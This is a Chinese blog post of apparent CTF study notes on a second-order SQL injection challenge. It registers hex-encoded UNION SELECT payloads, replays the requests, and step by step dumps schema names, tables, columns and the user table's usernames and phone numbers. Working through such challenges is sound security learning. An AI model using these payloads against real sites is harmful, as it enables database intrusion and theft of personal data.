• 主页
  • 未分类
  • 二次注入——i春秋
大事记时间轴~
  • 社团XSS平台
  • 全国青少年信息技术社团联盟
  • 全国中学生CTF论坛
  • 全国中学生CTF平台

    • 点击这里~阿里云服务器优惠购买!!

    社团群号:456866055
    站长QQ:1135891330

    二次注入——i春秋

    日期:2020-9-26 ssnhy13 浏览:463次 评论:0条

    i春秋-二次注入

    笔记本:

    网络安全学习笔记

    创建时间:

    2020/9/16 10:36

    更新时间:

    2020/9/16 10:54

    作者:

    2321388158@qq.com


    先注册账号,就是考二次注入吧

    手机号把payload转换成十六进制

    1 union select schema_name from information_schema.schemata


    0x3120756e696f6e2073656c65637420736368656d615f6e616d652066726f6d20696e666f


    发送到重放模块,要不然好像注册不了



    相应包中有success注册成功


    登录进去后点击check





    爆出数据库后,爆当前库下的表


    1 union select table_name from information_schema.tables where table_schema=database()



    转换十六进制

    0x3120756e696f6e2073656c656374207461626c655f6e616d652066726f6d20696e666f726




    重复刚才步骤



    查看信息,user表


    查字段 payload:

    1 union select column_name from information_schema.columns where table_schema=database() and table_name='user'


    转换十六进制



    重放模块





    查数据 payload:

    1 union select group_concat(username,phone) from user


    转换十六进制


    重放模块


    拿到flag


    相关推荐

    点击这里~阿里云服务器优惠购买!!

    社团群号:456866055
    站长QQ:1135891330

    发表评论

    路人甲
    看不清楚?点图切换

    网友评论(0)

    AD

    大事记时间轴~
  • 社团XSS平台
  • 全国青少年信息技术社团联盟
  • 全国中学生CTF论坛
  • 全国中学生CTF平台

    • 点击这里~阿里云服务器优惠购买!!

    社团群号:456866055
    站长QQ:1135891330